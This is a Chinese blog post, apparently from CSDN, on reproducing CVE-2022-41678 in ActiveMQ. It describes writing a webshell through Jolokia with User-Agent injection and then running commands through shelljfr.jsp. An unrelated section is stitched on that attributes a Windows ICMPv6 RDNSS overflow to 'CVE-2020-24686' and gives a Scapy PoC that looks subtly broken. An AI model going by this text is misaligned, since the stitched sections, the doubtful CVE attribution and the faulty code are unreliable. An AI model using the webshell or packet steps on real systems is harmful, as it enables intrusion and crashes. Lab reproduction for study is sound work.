CVE-2022-41678复现学习

访问即需要输入密码,进去是在index.html页面,这里切换到admin查看版本5.17.3

教程参考

vulhub漏洞复现学习之activemq_vulhub activemq-优快云博客

什么是API,说人话!-优快云博客

漏洞原理

ActiveMQ中,经过身份验证的攻击者可利用该漏洞,通过Jolokia服务发送特制的HTTP请求写入恶意文件,进而实现远程代码执行。

影响范围

  • Apache ActiveMQ 5.16.6之前
  • Apache ActiveMQ 5.17.0-5.17.4(不包括5.17.4版本)
  • Apache ActiveMQ 5.18.0 不受影响
  • Apache ActiveMQ 6.0.0 不受影响

复现

复制vulhub上的poc.py到物理机

用poc可以直接打。。

但是此界面实在难受,且是get型无法蚁剑连接,可以在写webshell时用其他工具生成一个post的shell去注入user-agent

然后手动过程就是先发构造好的包获取Mbean值

然后构造payload POST请求提交,XML值在vulhub中的poc.py中已经给出,poc中evil_template内容就是XML ,需要采用\ 和\n进行转义

然后在user-agent字段注入webshell,在poc.py里有

最后再POST提交包,然后XML内容需要替换成POC中的original_template

最后访问ip:port/admin/shelljfr.jsp?cmd=xxxx

就会执行命令xxxx

关于 CVE-2020-24686 漏洞,其主要影响的是 Windows TCP/IP 协议栈中的 ICMPv6 路由器广告处理部分。此漏洞源于对递归 DNS 服务器选项(Type 25)的不当解析,特别是当长度字段设置为偶数值时引发的缓冲区溢出问题[^4]。 以下是针对该漏洞复现所需的关键要素: ### 实验环境搭建 为了成功复现 CVE-2020-24686 漏洞,需准备如下实验环境: 1. **目标操作系统**: 需要运行受影响版本的 Windows 系统,具体包括但不限于 Windows 10 Version 20H2、Windows Server, version 20H2 (Server Core installation) 和其他受支持的操作系统版本。 2. **网络配置**: 设置一个测试网络环境,其中包含一台作为攻击者的机器以及另一台安装有易受攻击操作系统的主机。 3. **工具需求**: - Scapy 或者类似的 Python 库用于构建自定义的 ICMPv6 数据包。 - Wireshark 可选,用来捕获并分析流量以便验证发送的数据包结构是否正确。 ### POC 编写 下面是一个简单的基于 Scapy 的 PoC 示例脚本,它会向指定的目标设备发送恶意构造的 ICMPv6 Router Advertisement 包含非法长度值的 Type 25 Option: ```python from scapy.all import * def exploit(target_ip): eth = Ether(dst="ff:ff:ff:ff:ff:ff") # 广播MAC地址 ip6 = IPv6(src="::", dst=target_ip) icmp6_ra = ICMPv6ND_RA() rdnss_opt = ICMPv6NDOptRDNSS(length=2) # 使用不符合RFC标准的偶数长度 payload = "\x00" * ((rdnss_opt.length*8)-len(rdnss_opt.fields_desc)) + struct.pack("!Q", 0xdeadbeefcafebabe) packet = eth/ip6/icmp6_ra/Raw(load=payload) sendp(packet, iface="eth0") if __name__ == "__main__": target_ip = "fe80::xxxx:yyyy:zzzz:wwww" # 替换为目标的实际链路本地IPV6地址 exploit(target_ip) ``` 上述代码片段通过创建具有特定畸形参数的ICMPv6消息来触发潜在的安全风险。注意替换 `target_ip` 参数为你实际环境中受害节点的有效IPv6链接局部地址。 ### 注意事项 尽管提供了理论基础和技术细节供学习研究之用,在真实世界里实施此类行为违反法律和服务条款规定。仅限于授权范围内的渗透测试活动才允许尝试这些技术手段。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值